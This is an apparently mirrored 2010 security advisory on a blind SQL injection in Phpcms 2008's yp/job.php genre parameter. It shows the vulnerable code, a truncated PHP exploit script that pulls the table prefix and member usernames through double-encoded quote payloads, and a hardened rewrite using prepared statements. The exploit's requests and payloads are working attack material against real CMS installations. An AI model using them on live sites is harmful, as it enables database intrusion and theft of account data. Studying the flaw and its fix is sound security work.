Phpcms 2008 yp/job.php script blind SQL injection vulnerability - vulnerability warning - the black bar safety net

2010-06-24T00:00:00
ID MYHACK58:62201027357
Type myhack58
Reporter 佚名 (anonymous)
Modified 2010-06-24T00:00:00

Description

Affected version: Phpcms 2008

Vulnerability description: Phpcms is a website management system and one of the mainstream domestic (Chinese) CMS products.

In Phpcms the yp/job.php script passes the user-submitted $genre parameter through urldecode() and then uses it in an SQL query without proper filtering, so a remote attacker can submit a crafted request and perform a SQL injection attack. The following is the vulnerable PHP code fragment:

```php
switch($action) {
    case 'list':
        $catid = intval($catid);
        $head['keywords']    .= 'List positions';
        $head['title']       .= 'Job listings'.''.$PHPCMS['sitename'];
        $head['description'] .= 'Job listings'.''.$PHPCMS['sitename'];
        $templateid = 'job_list';
        if($inputtime) $time = time() - 3600*$inputtime*24;
        else $time = 0;
        if($time < 0) $time = 0;
        $where = "j.updatetime >= '{$time}' ";
        $genre = urldecode($genre);                               // decoded again, then interpolated unescaped
        if($station) $where .= "AND j.station = '{$station}' ";
        if($genre)   $where .= "AND c.genre = '{$genre}' ";       // injection point
        if(!trim($where)) $where = '1';
        break;
```

Reference: http://hi.baidu.com/netstart/blog/item/f891b1514a259112367abeb5.html

Test method:

[www.sebug.net] The program (method) provided by this site may be offensive in nature and is intended for security research and teaching purposes only; use at your own risk!

```php
<?php
ini_set("max_execution_time", 0);
error_reporting(7);

if ($argc != 4) usage();

$hostname = $argv[1];
$path     = $argv[2];
$userid   = $argv[3];
$prefix   = "phpcms_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;

function usage()
{
    global $argv;
    echo "\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit"
       . "\n[+] Author: My5t3ry"
       . "\n[+] Site  : http://hi.baidu.com/netstart"
       . "\n[+] Usage : php " . $argv[0] . " "
       . "\n[+] Ex.   : php " . $argv[0] . " localhost /yp 1"
       . "\n\n";
    exit();
}

// Send one GET to job.php with $query in the genre parameter and return the raw response.
function request($hostname, $path, $query)
{
    $fp = fsockopen($hostname, 80);
    $request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n"
             . "Host: {$hostname}\r\n"
             . "Connection: Close\r\n\r\n";
    fputs($fp, $request);
    $reply = '';
    while (!feof($fp)) $reply .= fgets($fp, 1024);
    fclose($fp);
    return $reply;
}

// Boolean check: true when the page body differs because the injected condition held.
function exploit($hostname, $path, $uid, $fld, $chr, $pos)
{
    global $prefix;
    $chr = ord($chr);
    $query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM " . $prefix . "member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";
    $query = str_replace(" ", "%20", $query);
    $query = str_replace("'", "%2527", $query);   // double-encoded quote: survives the first decode, becomes ' after urldecode()
    $outcode = request($hostname, $path, $query);
    preg_match("/(.+)<\/span>/", $outcode, $x);
    if (strlen(trim($x[1])) == 0) return false; else return true;
}

$query = "x%2527";
$outcode = request($hostname, $path, $query);
preg_match('/FROM `(.+)yp_job/ie', $outcode, $match);   // read the table prefix from the SQL error message
$prefix = $match[1];

//function lengthcolumns ()
//{
echo "\n--------------------------------------------------------------------------------\n";
echo "PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo "    By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";

if ($match[1]) {
    echo '[+]Good Job! Wo Got The pre -> ' . $match[1] . "\n";
} else {
    die(" Exploit failed...");
}

echo "[~]trying to get username length...\n";
$exit = 0; $length = 0; $i = 0;
while ($exit == 0) {
    $query = "x' OR length((select username from " . $prefix . "member Where userid='{$userid}'))=" . $i . " OR '1'='2";
    $query = str_replace(" ", "%20", $query);
    $query = str_replace("'", "%2527", $query);
    $outcode = request($hostname, $path, $query);
    $i++;
    preg_match("/(.+)<\/span>/", $outcode, $x);
    //echo $outcode;
    if ($i > 20) { die(" Exploit failed..."); }
    if (strlen(trim($x[1])) != 0) {
```

(The listing is cut off here; it continues on page 2 of the original post.)
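The vulnerable fragment at the top of this advisory rebuilt on PDO prepared statements, as an added example that is not PHPCMS's own code; the in-memory SQLite schema, the table names yp_job/yp_category, and the whereClauseVulnerable()/listJobs() functions are assumptions made for the demo:

```php
<?php
// Added example, not PHPCMS code: the job.php "list" filter rebuilt on PDO
// prepared statements. The tables and rows are constructed for this demo;
// the real yp_job/category tables have more columns.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE yp_job (jobid INTEGER, updatetime INTEGER, station INTEGER, catid INTEGER)');
$pdo->exec('CREATE TABLE yp_category (catid INTEGER, genre TEXT)');
$pdo->exec("INSERT INTO yp_category VALUES (1, 'IT'), (2, 'Sales')");
$pdo->exec('INSERT INTO yp_job VALUES (10, ' . time() . ', 4, 1), (11, ' . time() . ', 4, 2)');

// The advisory's pattern: urldecode() is applied a second time to a value PHP
// already decoded, then the result is spliced into SQL. %2527 in the request
// reaches the script as %27 and becomes a bare quote inside the WHERE clause.
function whereClauseVulnerable(string $genre): string
{
    $genre = urldecode($genre);
    return "c.genre = '{$genre}'";
}

// Hardened: no second decode, every user-supplied value is bound as a
// parameter, and the SQL text itself never contains user content.
function listJobs(PDO $pdo, int $inputtime, int $station, string $genre): array
{
    $time = $inputtime > 0 ? max(0, time() - 3600 * $inputtime * 24) : 0;
    $sql = 'SELECT j.jobid FROM yp_job j JOIN yp_category c ON j.catid = c.catid'
         . ' WHERE j.updatetime >= :time';
    $params = [':time' => $time];
    if ($station > 0) {
        $sql .= ' AND j.station = :station';
        $params[':station'] = $station;
    }
    if ($genre !== '') {
        $sql .= ' AND c.genre = :genre';   // compared as a literal, quotes included
        $params[':genre'] = $genre;
    }
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a normal genre, and the advisory's tautology shape as PHP
// sees it after its own single decode of the query string.
$clean = 'IT';
$probe = 'x%27 OR %271%27=%271';
echo whereClauseVulnerable($probe), "\n";  // the quote lands in the SQL text
print_r(listJobs($pdo, 0, 4, $clean));    // one row: jobid 10
print_r(listJobs($pdo, 0, 4, $probe));    // empty: no genre equals that string
```

Requires the pdo_sqlite extension; the same binding pattern applies unchanged to the MySQL PDO driver PHPCMS would use.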